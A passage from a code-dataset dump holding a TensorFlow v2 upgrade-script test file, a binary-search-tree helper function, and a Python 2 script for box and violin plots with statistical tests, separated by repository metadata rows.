self.assertIn(new_text, [expected_text1, expected_text2])
def testCast(self):
for (name, dtype) in [("int32", "int32"),
("int64", "int64"),
("float", "float32"),
("double", "float64"),
("complex64", "complex64"),
("complex128", "complex128"),
("bfloat16", "bfloat16")]:
text = "tf.to_%s(x, name='test')" % name
expected_text = "tf.cast(x, name='test', dtype=tf.%s)" % dtype
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testCastPositionalSecondArgument(self):
for (name, dtype) in [("int32", "int32"),
("int64", "int64"),
("float", "float32"),
("double", "float64"),
("complex64", "complex64"),
("complex128", "complex128"),
("bfloat16", "bfloat16")]:
text = "tf.to_%s(x, 'test')" % name
expected_text = "tf.cast(x, name='test', dtype=tf.%s)" % dtype
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testImageResize(self):
for method in ["bilinear", "area", "bicubic", "nearest_neighbor"]:
text = "tf.image.resize_%s(i, s)" % method
expected_text = ("tf.image.resize(i, s, "
"method=tf.image.ResizeMethod.%s)" % method.upper())
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testImageResizeExtraPositionalArgs(self):
for method in ["bilinear", "area", "bicubic", "nearest_neighbor"]:
text = "tf.image.resize_%s(i, s, a, p)" % method
expected_text = ["tf.image.resize(i, s, ", "align_corners=a, ",
"preserve_aspect_ratio=p, ",
"method=tf.image.ResizeMethod.%s)" % method.upper()]
_, unused_report, unused_errors, new_text = self._upgrade(text)
for s in expected_text:
self.assertIn(s, new_text)
def testCond(self):
text = "tf.cond(a, b, c, True)"
expected_text = "tf.cond(pred=a, true_fn=b, false_fn=c)"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("tf.cond", errors[0])
self.assertIn("requires manual check", errors[0])
def testParens(self):
text = """
def _log_prob(self, x):
return tf.reduce_logsumexp(
(self.mixture_distribution.logits + self.distribution.log_prob(
x[..., tf.newaxis])),
axis=-1)"""
expected_text = """
def _log_prob(self, x):
return tf.reduce_logsumexp(
input_tensor=(self.mixture_distribution.logits + self.distribution.log_prob(
x[..., tf.newaxis])),
axis=-1)"""
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testAssertStatements(self):
for name in ["assert_greater", "assert_equal", "assert_none_equal",
"assert_less", "assert_negative", "assert_positive",
"assert_non_negative", "assert_non_positive", "assert_near",
"assert_less", "assert_less_equal", "assert_greater",
"assert_greater_equal", "assert_integer", "assert_type",
"assert_scalar"]:
text = "tf.%s(a)" % name
expected_text = "tf.compat.v1.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_* functions", errors[0])
text = "tf.debugging.%s(a)" % name
expected_text = "tf.compat.v1.debugging.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_* functions", errors[0])
def testAssertRankStatements(self):
for name in ["assert_rank", "assert_rank_at_least", "assert_rank_in"]:
text = "tf.%s(a)" % name
expected_text = "tf.compat.v1.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_rank_* functions", errors[0])
text = "tf.debugging.%s(a)" % name
expected_text = "tf.compat.v1.debugging.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_rank_* functions", errors[0])
class TestUpgradeFiles(test_util.TensorFlowTestCase):
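  # End-to-end check: run the upgrader over a real temporary file and verify the rewritten contents.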
def testInplace(self):
"""Check to make sure we don't have a file system race."""
temp_file = tempfile.NamedTemporaryFile("w", delete=False)
original = "tf.conj(a)\n"
upgraded = "tf.math.conj(a)\n"
temp_file.write(original)
temp_file.close()
upgrader = ast_edits.ASTCodeUpgrader(tf_upgrade_v2.TFAPIChangeSpec())
upgrader.process_file(temp_file.name, temp_file.name)
self.assertAllEqual(open(temp_file.name).read(), upgraded)
os.unlink(temp_file.name)
if __name__ == "__main__":
test_lib.main()
|
[
"[email protected]"
] | |
b8b3aa3da22010a0dbb13fa9eae2bcadfe7846f4
|
636411baa2fc5b5c81710b37d6c53fa7076b9026
|
/BST/find_first_greater_than_k.py
|
12b3afc941d7a7ff0be4c0c824ceb1a71ea54c17
|
[] |
no_license
|
tberhanu/elts-of-coding
|
9d90fb23db829c1b41782e2f96978ea9bde59484
|
f17881c5732853935bc36b93d00ff58e7f759ed6
|
refs/heads/master
| 2023-01-04T13:28:31.315542 | 2020-10-30T01:24:48 | 2020-10-30T01:24:48 | 297,862,717 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,369 |
py
|
from BST.detail_note import BSTNode
from BST import is_binary_tree_bst
from BST import sample_bst
def find_first_greater_than_k(tree, k):
"""
Given a BST TREE and value K, return the closest number that is greater than K from the BST.
Strategy:
If the node value is less than k, COMPLETELY IGNORE IT, and continue searching to the RIGHT, but
if the node value is greater than k, that is a POSSIBLE CANDIDATE, so save that SUBTREE or VALUE,
and keep searching to the LEFT in case you get another node with value greater than k but less
than the previously saved node value, which means if we get another value greater than K but more
closer to K.
Time: O(H) where H is the BST tree height, O(log N).
Space: O(1)
"""
best_value_so_far = None
while tree:
if tree.data > k:
best_value_so_far = tree.data
tree = tree.left
else:
tree = tree.right
return best_value_so_far
if __name__ == "__main__":
bst = BSTNode(990, BSTNode(200, BSTNode(188), BSTNode(299)), BSTNode(1000, BSTNode(999), BSTNode(1001)))
print(is_binary_tree_bst.is_binary_tree_bst(bst))
result = find_first_greater_than_k(bst, 299)
print(result)
print(is_binary_tree_bst.is_binary_tree_bst(sample_bst))
print(find_first_greater_than_k(sample_bst, 99))
|
[
"[email protected]"
] | |
fae6ad0a1904c63b3c6215ee5cbc6c8ed4b3541e
|
e51440020cebb432e0ce1f951c9c5700ebfb900c
|
/plotViolinBox.py
|
65eceb9219f2503ee3c3d76173fc5db238c7988c
|
[
"MIT"
] |
permissive
|
albertwcheng/albert-bioinformatics-scripts
|
f592f229fc69ff3798cbe4b630e47a48f7dbaa68
|
cbe2a5088f069ee9f64c8c006b08dbef98585ba0
|
refs/heads/master
| 2022-05-26T17:57:00.929988 | 2022-04-18T22:09:57 | 2022-04-18T22:09:57 | 1,090,901 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 37,933 |
py
|
#!/usr/bin/env python
import warnings
warnings.filterwarnings("ignore")
#derived from plotExpBox2.py
'''
Copyright 2010 Wu Albert Cheng <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
from pylab import *
from sys import stderr,stdout,argv
from getopt import getopt
import sys
from albertcommon import *
from welchttest import welchs_approximate_ttest_arr
from scipy.stats.stats import ttest_ind,ttest_1samp,mannwhitneyu
from scipy.stats import wilcoxon,ansari,fligner,levene,bartlett
from glob import glob
from random import *
from PZFXMaker import *
from scipy.stats import gaussian_kde,histogram
from numpy import arange
import traceback
import numpy
from math import log
def divideDataPerCols(data,thresholds): # [||]
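	# Split every column of `data` into len(thresholds)+1 sub-populations: values below
	# thresholds[0], values falling between consecutive thresholds, and values >= the last
	# threshold. Returns a list of len(thresholds)+1 column-lists, one (possibly empty)
	# value list per original column in each.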
dividedDataMain=[]
lent=len(thresholds)
for i in range(0,lent+1):
dividedDataMain.append([])
for i in range(0,len(data)): #go thru the columns
curCol=data[i]
for j in range(0,len(thresholds)+1):
dividedDataMain[j].append([])
for x in curCol:
#now classifies
k=-1
if x<thresholds[0]:
k=0
elif x>=thresholds[lent-1]:
k=lent
else:
for j in range(0,lent-1):
if x>=thresholds[j] and x<thresholds[j+1]:
k=j+1
dividedDataMain[k][i].append(x)
return dividedDataMain
def plotExpBox(data,xtickLabels,showIndPoints,mark,markMean,showMean,notch,whisker,outliers,xlegendrotation,xlabe,ylabe,titl,showSampleSizes,showViolin,showBox,annot,trendData,plotItemLegend,makePzfxFile,makeBinMatrix,dividePlots):
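	# Core drawing routine: renders box plots and/or violin plots (optionally split into
	# sub-populations via dividePlots), overlays means, individual points, trend curves and
	# per-column sample sizes, and can additionally emit a Prism .pzfx table and a binned
	# matrix of the plotted data.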
#fig=plt.figure()
if plotItemLegend:
ax2=subplot(122)
ax=subplot(121)
else:
ax=gca()
prevHoldState=ishold()
hold(True)
if outliers:
fliers="b+"
else:
fliers=""
whisValue=0.0
if whisker:
whisValue=1.5
for axhlin in axhlines:
#print axhlin
linw=1
try:
linw=float(axhlin[3])
except:
pass
axhline(float(axhlin[0]),linestyle=axhlin[1],color=axhlin[2],linewidth=linw)
if len(dividePlots)>0: #make divided matrices
dataDP=divideDataPerCols(data,dividePlots)
##for i in range(0,len(data)):
## print >> stderr,len(data[i])
if showBox:
if len(dividePlots)==0:
boxplotted=ax.boxplot(data,notch,widths=0.5,sym=fliers,whis=whisValue)
#setp(boxplotted["boxes"],color="blue")
whiskerlines=boxplotted["whiskers"]
for w in whiskerlines:
w.set_linestyle(whiskerStyle)
else:
for datdp in dataDP:
boxplotted=ax.boxplot(datdp,notch,widths=0.5,sym=fliers,whis=whisValue)
#setp(boxplotted["boxes"],color="blue")
whiskerlines=boxplotted["whiskers"]
for w in whiskerlines:
w.set_linestyle(whiskerStyle)
#w.set_linewidth(5)
#print >> stderr,resultD
maxMax=-10000000.0
minMin=10000000.0
violinw=min(0.15*max(len(data)-1,1.0),0.5)
if trendData:
#print >> stderr,"plot"
for trendDataStartIdx,trendDataForThisStartIdx in trendData.items():
#print >> stderr,"plot",len(trendDataForThisStartIdx)
trendcurves=[]
legendlabels=[]
if annot:
annotForThisStartIdx=annot[trendDataStartIdx]
for i in range(0,len(trendDataForThisStartIdx)):
trendDataPerItem=trendDataForThisStartIdx[i]
if annot:
annotThisItem=annotForThisStartIdx[i]
if trendDataPerItem:
#print >> stderr,"plot"
thisTrend=ax.plot(range(trendDataStartIdx+1,trendDataStartIdx+len(trendDataPerItem)+1),trendDataPerItem,"-")
if annot and plotItemLegend:
trendcurves.append(thisTrend)
legendlabels.append(annotThisItem)
for i in range(0,len(data)):
curCol=data[i]
# datasorted=data[:]
# datasorted.sort()
# numData=len(datasorted)
# HQn=numData*3/4
# LQn=numData*1/4
# maxMax=max(maxMax,datasorted[HQn]*1.5)
# minMin=min(minMax,datasorted[LQn]*1.5)
maxMax=max(maxMax,max(curCol))
minMin=min(minMin,min(curCol))
if showMean:
ax.plot([i+0.75,i+1.25],[mean(curCol)]*2,markMean)
if showViolin:
if len(dividePlots)==0:
kernel=gaussian_kde(curCol)
kernel_min=kernel.dataset.min()
kernel_max=kernel.dataset.max()
violinx=arange(kernel_min,kernel_max,(kernel_max-kernel_min)/100.)
violinv=kernel.evaluate(violinx)
violinv=violinv/violinv.max()*violinw
fill_betweenx(violinx,i+1,violinv+i+1,facecolor=vfacecolor,alpha=valpha) #'y', 0.3
fill_betweenx(violinx,i+1,-violinv+i+1,facecolor=vfacecolor,alpha=valpha)
else:
for j in range(0,len(dataDP)):
curcoldp=dataDP[j][i]
if len(curcoldp)<2:
continue
kernel=gaussian_kde(curcoldp)
kernel_min=kernel.dataset.min()
kernel_max=kernel.dataset.max()
violinx=arange(kernel_min,kernel_max,(kernel_max-kernel_min)/100.)
violinv=kernel.evaluate(violinx)
violinv=violinv/violinv.max()*violinw
fill_betweenx(violinx,i+1,violinv+i+1,facecolor=vfacecolor,alpha=valpha) #'y', 0.3
fill_betweenx(violinx,i+1,-violinv+i+1,facecolor=vfacecolor,alpha=valpha)
if showIndPoints:
plot([i+1]*len(curCol),curCol,mark)
if showSampleSizes:
if len(dividePlots)==0:
for i in range(0,len(data)):
curCol=data[i]
text(i+1,maxMax*1.05,str(len(curCol)),horizontalalignment='center',verticalalignment='center',color='red')
else:
for i in range(0,len(data)):
thisL=[]
for j in range(0,len(dataDP)):
thisL.append(len(dataDP[j][i]))
sumL=sum(thisL)
text(i+1,maxMax*1.05,"+".join([str(x) for x in thisL])+"="+str(sumL),horizontalalignment='center',verticalalignment='center',color='red')
xticks( range(1,len(data)+1), xtickLabels , rotation=xlegendrotation)
if makeBinMatrix:
binMatrixOutFilename,binMatrixNumBins=makeBinMatrix
outputBinFiles(binMatrixOutFilename,data,xtickLabels,minMin,maxMax,binMatrixNumBins)
if makePzfxFile:
pzfxTemplateFile,outFile,tableRefID=makePzfxFile
#prepare data format
PzfxData=[]
for xtickLabel,dataCol in zip(xtickLabels,data):
PzfxData.append( [xtickLabel, dataCol ] )
writePzfxTableFile(outFile,pzfxTemplateFile,tableRefID,titl,80,3,PzfxData)
xlabel(xlabe)
ylabel(ylabe)
title(titl)
if ylims:
ylim([ylims[0],ylims[1]])
else:
ylim([minMin-maxMax*0.1,maxMax*1.1])
if plotItemLegend:
box=ax.get_position()
#gcf().set_figwidth(gcf().get_figwidth()*2)
#ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
#subplots_adjust(top=0.8,bottom=0.1,left=0,right=0.8)
#box2=ax2.get_position()
#ax2.set_position([box2.x0,box2.y0, box.width * 0.1,box.height])
subplots_adjust(top=0.8, bottom=0.1, left=0, right=0.8)
leg=ax.legend(trendcurves,legendlabels,bbox_to_anchor=(1,0),loc="center left")
#leg = gcf().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=10)
hold(prevHoldState)
def findIndices(needles,haystack):
indices=[]
for needle in needles:
indices.append(haystack.index(needle))
return indices
def rearrangeColAndRowSqMatrix(M,from_indices):
newM=[]
lenM=len(M)
for r in range(0,lenM):
newRow=[]
newM.append(newRow)
for c in range(0,lenM):
newRow.append(M[from_indices[r]][from_indices[c]])
return newM
def printMatrix(stream,M,prefixes):
for row,prefix in zip(M,prefixes):
for cell in row:
print >> stream,"%g\t" % (cell),
print >> stream,prefix
#use pvalue as a distance metric
#dist=1-pvalues
#fake the record for PyCluster
def makePValueClusterPlot(jobname,sampleNames,pvaluesM,methodCluster):
#fake a record
record=Record()
#fake M
M=[]
Mr=[]
M.append(Mr)
for sample in sampleNames:
Mr.append(0)
record.data=numpy.array(M)
record.mask=None
record.geneid=["Dummy"]
record.genename=["Dummy"]
record.expid=sampleNames
record.uniqid="GENENAME"
#now do something serious
distM=[]
for pvalueRows in pvaluesM:
distRow=[]
distM.append(distRow)
for pvalue in pvalueRows:
distRow.append(1.0-pvalue)
#now cluster
Tree=treecluster(distancematrix=distM,method=methodCluster)
record.save(jobname,expclusters=Tree)
#now hijack the result file and change it to pvalue heatmap
fil=open(jobname+".cdt")
firstthreelines=[]
lino=0
for lin in fil:
lino+=1
if lino>3:
break
lin=lin.rstrip()
firstthreelines.append(lin)
if lino==1:
fields=lin.split("\t")
arrayOrdered=fields[3:]
fil.close()
fil=open(jobname+".cdt","w")
for lin in firstthreelines:
print >> fil, lin
rearrangedCorrMatrix=rearrangeColAndRowSqMatrix(pvaluesM,findIndices(arrayOrdered,sampleNames))
for i in range(0,len(arrayOrdered)):
print >> fil, arrayOrdered[i]+"\t"+arrayOrdered[i]+"\t"+"1.000000",
for j in range(0,len(arrayOrdered)):
print >> fil,"\t"+str(rearrangedCorrMatrix[i][j]),
print >> fil,""
fil.close()
fil=open(jobname+".mat","w")
print >> fil, "Correlation Matrix (Not Clustered)"
print >> fil,"\t".join(sampleNames)
printMatrix(fil, pvaluesM, sampleNames)
print >> fil, "Correlation Matrix (Clustered)"
print >> fil,"\t".join(arrayOrdered)
printMatrix(fil, rearrangedCorrMatrix, arrayOrdered)
fil.close()
def makePValueRawPlot(jobname,sampleNames,pvaluesM):
#fake a record
record=Record()
#fake M
M=[]
Mr=[]
M.append(Mr)
for sample in sampleNames:
Mr.append(0)
record.data=numpy.array(M)
record.mask=None
record.geneid=["Dummy"]
record.genename=["Dummy"]
record.expid=sampleNames
record.uniqid="GENENAME"
#now do something serious
record.save(jobname)
#now hijack the result file and change it to pvalue heatmap
fil=open(jobname+".cdt")
firstthreelines=[]
lino=0
for lin in fil:
lino+=1
if lino>2:
break
lin=lin.rstrip()
firstthreelines.append(lin)
if lino==1:
fields=lin.split("\t")
arrayOrdered=fields[3:]
fil.close()
fil=open(jobname+".cdt","w")
for lin in firstthreelines:
print >> fil, lin
rearrangedCorrMatrix=pvaluesM
for i in range(0,len(arrayOrdered)):
print >> fil, arrayOrdered[i]+"\t"+arrayOrdered[i]+"\t"+"1.000000",
for j in range(0,len(arrayOrdered)):
print >> fil,"\t"+str(rearrangedCorrMatrix[i][j]),
print >> fil,""
fil.close()
def trimData(plotData,size):
for plotDataVector in plotData:
shuffle(plotDataVector)
del plotDataVector[size:len(plotDataVector)]
def drawHistogram(outfilename,plotData,xtickLabels,nbins=50):
fig=figure(figsize=(8,len(plotData)*2))
fig.subplots_adjust(top=0.8, bottom=0.1, left=0.2, right=0.8)
#find minmin and maxmax for plotData
minmin=min(plotData[0])
maxmax=max(plotData[0])
for i in range(1,len(plotData)):
minmin=min(minmin,min(plotData[i]))
maxmax=max(maxmax,max(plotData[i]))
rangedata=maxmax-minmin
#maxmax+=rangedata/float(nbin)
#minmin-=rangedata/float(nbin)
maxy=0
axes=[]
for i,D,label in zip(range(0,len(plotData)),plotData,xtickLabels):
ax = fig.add_subplot(len(plotData),1,i+1) #len(plotData),1,i #i+1 in place of i (6/18/2012)
__n,__bins,__patches=ax.hist(D,nbins,(minmin,maxmax),True,histtype="stepfilled")
#ax.plot(__bins,__n,'r-')
maxy=max(maxy,max(__n))
ax.set_title(label)
density = gaussian_kde(D)
xs = np.linspace(minmin,maxmax,200)
density.covariance_factor = lambda : .25
density._compute_covariance()
ax.plot(xs,density(xs))
#ax.set_xlim(minmin,maxmax)
#ax.set_ylim(0,maxy)
axes.append(ax)
#fig.show()
for ax in axes:
ax.set_ylim(0,maxy*1.1)
fig.savefig(outfilename,bbox_inches="tight")
def drawDensigram(outfilename,plotData,xtickLabels,nbins=50):
fig=figure(figsize=(8,len(plotData)*2))
fig.subplots_adjust(top=0.8, bottom=0.1, left=0.2, right=0.8)
#find minmin and maxmax for plotData
minmin=min(plotData[0])
maxmax=max(plotData[0])
for i in range(1,len(plotData)):
minmin=min(minmin,min(plotData[i]))
maxmax=max(maxmax,max(plotData[i]))
rangedata=maxmax-minmin
#maxmax+=rangedata/float(nbin)
#minmin-=rangedata/float(nbin)
maxy=0
axes=[]
for i,D,label in zip(range(0,len(plotData)),plotData,xtickLabels):
ax = fig.add_subplot(len(plotData),1,i+1) #len(plotData),1,i #i+1 in place of i (6/18/2012)
ax.set_title(label)
density = gaussian_kde(D)
xs = np.linspace(minmin,maxmax,200)
density.covariance_factor = lambda : .25
density._compute_covariance()
ax.plot(xs,density(xs))
axes.append(ax)
fig.savefig(outfilename,bbox_inches="tight")
def outputBinFiles(outfilename,plotData,xtickLabels,minMin,maxMax,nbins=50):
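	# Histogram every column over the shared range [minMin, maxMax] using `nbins` bins and
	# write a tab-separated matrix of per-column bin fractions (counts normalized by the
	# column total) to `outfilename`.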
histoArrays=[]
_low_range=-100
_binsize=-100
_extrapoints=-1
for col,xtickLabel in zip(plotData,xtickLabels):
histoArray,low_range,binsize,extrapoints=histogram(col,numbins=nbins,defaultlimits=(minMin,maxMax))
histoArrays.append(histoArray)
if _binsize==-100:
_binsize=binsize
_low_range=low_range
else:
if _binsize!=binsize or low_range!=_low_range:
print >> stderr,"inconsistent histo",_binsize,_low_range,histoArray,low_range,binsize,extrapoints
exit(1)
if extrapoints>0:
print >> stderr,"extrapoints>0",histoArray,low_range,binsize,extrapoints
exit(1)
binLows=[]
for i in range(0,nbins):
binLows.append(i*binsize)
outfil=open(outfilename,"w")
outv=["bins"]
for binLow in binLows:
outv.append(str(binLow))
print >> outfil,"\t".join(outv)
#now the data
for xtickLabel,histoArray in zip(xtickLabels,histoArrays):
outv=[xtickLabel]
totalPoint=sum(histoArray)
for v in histoArray:
outv.append(str(float(v)/totalPoint))
print >> outfil,"\t".join(outv)
outfil.close()
def filterDataInRangeInclusive(D,mi,ma):
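	# Keep only the values of D inside [mi, ma] (either bound may be None, meaning unbounded)
	# and also report the total count and how many values fell inside, below and above the range.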
xd=[]
N=0
NIN=0
NBelow=0
NAbove=0
for d in D:
N+=1
if mi!=None and d<mi:
NBelow+=1
continue
if ma!=None and d>ma:
NAbove+=1
continue
xd.append(d)
NIN+=1
return xd,N,NIN,NBelow,NAbove
def writeXYZPvalues(filename,xtickLabels,pvalueM):
fil=open(filename,"w")
for x in range(0,len(xtickLabels)):
for y in range(0,len(xtickLabels)):
print >> fil,xtickLabels[x]+"\t"+str(xtickLabels[y])+"\t"+str(pvalueM[x][y])
fil.close()
def mean2(X):
return float(sum(X))/len(X)
def plotExpBox_Main(inputFiles,headers,valcols,outputFile,sep,startRow,showIndPoints,mark,markMean,showMean,notch,whisker,outliers,plotPvalueCluster,outputClusterPrefix,methodCluster,xlegendrotation,xlabe,ylabe,figsz,titl,showSampleSizes,trimToMinSize,relabels,logb,plotHistogramToFile,plotMedianForGroups,botta,showViolin,showBox,firstColAnnot,plotTrend,showLegend,makePzfxFile,makeBinMatrix,writeDataSummaryStat,summaryStatRange,minuslog10pvalue,minNDataToKeep,vfacecolor,valpha,outXYZPvalues,dividePlots):
#if plotPvalueCluster:
#if pvalue cluster is needed:
# from Bio.Cluster.cluster import *
# from Bio.Cluster import *
#endif
#the real deal!
plotData=[]
xtickLabels=[]
trendData={}
annot={}
minSize=-1
for inputFile,header,cols in zip(inputFiles,headers,valcols):
fin=generic_istream(inputFile)
startIdx=len(plotData)
if firstColAnnot:
colAnnot=cols[0]
cols=cols[1:]
annotThisFile=[]
annot[startIdx]=annotThisFile
else:
colAnnot=-1
annotThisFile=None
for col in cols:
plotData.append([])
xtickLabels.append(header[col])
colIndices=range(startIdx,startIdx+len(cols))
if plotTrend:
#print >> stderr,"plotTrend"
trendDataThisFile=[]
trendData[startIdx]=trendDataThisFile
else:
trendDataThisFile=None
lino=0
for lin in fin:
lino+=1
if lino<startRow:
continue
fields=lin.rstrip("\r\n").split(sep)
if plotTrend:
#print >> stderr,"a"
trendDataThisLine=[]
else:
trendDataThisLine=None
allDataOKThisLine=True
if colAnnot>=0:
annotThisFile.append(fields[colAnnot])
for idx,col in zip(colIndices,cols):
try:
value=float(fields[col])
if logb!=0:
if value==0.0:
raise ValueError
value=log(value)/logb
plotData[idx].append(value)
if plotTrend:
trendDataThisLine.append(value)
#print >> stderr,"value:",value
except:
allDataOKThisLine=False
if plotTrend:
if allDataOKThisLine:
trendDataThisFile.append(trendDataThisLine)
else:
trendDataThisFile.append(None)
fin.close()
if minSize==-1:
minSize=len(plotData[idx]) #or startIDX?
else:
minSize=min([minSize,len(plotData[idx])])
if trimToMinSize:
print >> stderr,"trimming to min size =",minSize
trimData(plotData,minSize)
if len(relabels)>0:
#if len(relabels)!=len(xtickLabels):
# print >> stderr,"relabels doesn't have the same length as original label vectors",xtickLabels,"=>",relabels
# exit()
print >> stderr,xtickLabels
print >> stderr,relabels
for i,relabel in zip(range(0,len(relabels)),relabels):
xtickLabels[i]=relabel
for i in range(0,len(plotMedianForGroups)):
plotMedianForGroups[i]=getCol0ListFromCol1ListStringAdv(xtickLabels,plotMedianForGroups[i])
#drawing medians:
medianToDraw=[]
for mediangrouper in plotMedianForGroups:
curD=[]
for c in mediangrouper:
curD.extend(plotData[c])
medianToDraw.append(median(curD))
for c in range(len(plotData)-1,-1,-1):
if len(plotData[c])<minNDataToKeep:
print >> stderr,xtickLabels[c],"discarded because has only",len(plotData[c]),"data points <",minNDataToKeep
del plotData[c]
del xtickLabels[c]
if not skipStat:
print >> stdout,"student t-test (1 sample; mean=0)"
print >> stdout,"sample","mean","p-val","median"
if writeDataSummaryStat:
fDSS=open(writeDataSummaryStat,"w")
print >> fDSS,"sample\tmean\tvar\tsd\tmin\tmax\tN\tNInRange["+str(summaryStatRange[0])+","+str(summaryStatRange[1])+"]\t%NInRange\tNbelowRange\t%Nbelow\tNAboveRange\t%NAbove"
for x in range(0,len(plotData)):
#print >> stderr, len(plotData[x])
try:
print >> stdout, xtickLabels[x],mean(plotData[x]),ttest_1samp(plotData[x],0)[1],median(plotData[x])
except:
print >> stdout, xtickLabels[x],mean(plotData[x]),"NA",median(plotData[x])
if writeDataSummaryStat:
sumData,N,NIN,NBelow,NAbove=filterDataInRangeInclusive(plotData[x],summaryStatRange[0],summaryStatRange[1])
if NIN>1:
#print >> stderr,"sumData=",sumData
#print >> stderr,mean
mea=mean2(sumData)
DDOF=1
sd=std(sumData,ddof=DDOF)
var=sd*sd
mi=min(sumData)
ma=max(sumData)
else:
mea="NA"
sd="NA"
var="NA"
mi="NA"
ma="NA"
print >> fDSS,xtickLabels[x]+"\t"+str(mea)+"\t"+str(var)+"\t"+str(sd)+"\t"+str(mi)+"\t"+str(ma)+"\t"+str(N)+"\t"+str(NIN)+"\t"+str(float(NIN)*100/N)+"\t"+str(NBelow)+"\t"+str(float(NBelow)*100/N)+"\t"+str(NAbove)+"\t"+str(float(NAbove)*100/N)
pvalueM=[]
if writeDataSummaryStat:
fDSS.close()
print >> stdout,""
print >> stdout,"student t-test (2 samples)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
try:
pvalue=ttest_ind(plotData[x],plotData[y])[1]
except:
pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout, str(pvalue),
pvalueRow.append(pvalue)
print >> stdout,"";
print >> stdout,""
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_t_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_t",xtickLabels,pvalueM,methodCluster)
pvalueM=[]
print >> stdout,"welch t-test"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
try:
pvalue=welchs_approximate_ttest_arr(plotData[x],plotData[y])[3]
except:
pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout, str(pvalue),
pvalueRow.append(pvalue)
print >> stdout,"";
if outXYZPvalues:
writeXYZPvalues(outXYZPvalues+"_Welch.xyz",xtickLabels,pvalueM)
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_Welch_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_Welch",xtickLabels,pvalueM,methodCluster)
print >> stdout,""
print >> stdout,"non-parametric (Mann-Whitney U)" #"non-parametric (Mann-Whitney U if larger n<=20 else Wilcoxon)"
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
for y in range(0,len(plotData)):
if y<=x:
print >> stdout, "",
if x==y:
if minuslog10pvalue:
pvalueRow.append(0.0)
else:
pvalueRow.append(1.0)
else:
pvalueRow.append(pvalueM[y][x])
else:
#if max(len(plotData[x]),len(plotData[y]))<=20:
try:
pvalue=mannwhitneyu(plotData[x],plotData[y])[1]*2
except:
pvalue=1.0
if minuslog10pvalue and str(pvalue)!="NA":
try:
pvalue=-1*log(pvalue,10)
except:
pvalue=-1000.0
print >> stdout,pvalue, #mann-whiteney need to mul by 2 (one tail to two tail)
pvalueRow.append(pvalue)
#else:
# print >> stdout,wilcoxon(plotData[x],plotData[y])[1], # this is two-tailed already stdout, "", #
print >> stdout,"";
if outXYZPvalues:
writeXYZPvalues(outXYZPvalues+"_U.xyz",xtickLabels,pvalueM)
if plotPvalueCluster:
makePValueRawPlot(outputClusterPrefix+"_U_raw",xtickLabels,pvalueM)
makePValueClusterPlot(outputClusterPrefix+"_U",xtickLabels,pvalueM,methodCluster)
#####now the variance tests
print >> stdout,""
print >> stdout,"Ansari-Bradley Two-sample Test for difference in scale parameters "
print >> stdout,"p-val",
for x in range(0,len(plotData)):
print >> stdout,xtickLabels[x],
pvalueM=[]
print >> stdout,""
for x in range(0,len(plotData)):
pvalueRow=[]
pvalueM.append(pvalueRow)
print >> stdout, xtickLabels[x],
